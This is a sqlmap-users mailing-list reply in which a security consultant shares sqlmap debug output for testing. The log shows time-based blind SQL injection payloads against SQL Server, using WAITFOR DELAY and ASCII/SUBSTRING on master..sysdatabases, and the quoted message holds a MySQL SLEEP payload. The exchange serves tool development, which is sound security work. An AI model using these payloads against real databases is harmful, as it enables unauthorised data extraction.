Re: [sqlmap-users] New SQL Server blind test

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
> ok, fair enough.
> 
> please just send one of payloads used for data retrieval (something
> like this one):
> 
> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_
> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) >
>  104), SLEEP(5), 9290)
> 
> you'll see them with -v 3. you can censor table names. please, i just
> want to see something workable used for data retrieval (just spot
> those payloads with '>' inside)
> 
> kr

Since you seem anxious, I'll send the warm up.. Hasn't hit the good part
yet. ;-)

[09:41:40] [INFO] fetching database names
[09:41:40] [INFO] fetching number of databases
[09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:41:40] [WARNING] time-based comparison needs larger statistical
model. Making a few dummy requests, please wait..
[09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND
'MQWi'='MQWi
[09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT
ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM
master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [INFO] retrieved: 24
[09:43:37] [DEBUG] performed 10 queries in 117 seconds

-- 
 | Steven Pinkham, Security Consultant    |
 | http://www.mavensecurity.com           |
 | GPG public key ID CD31CAFB             |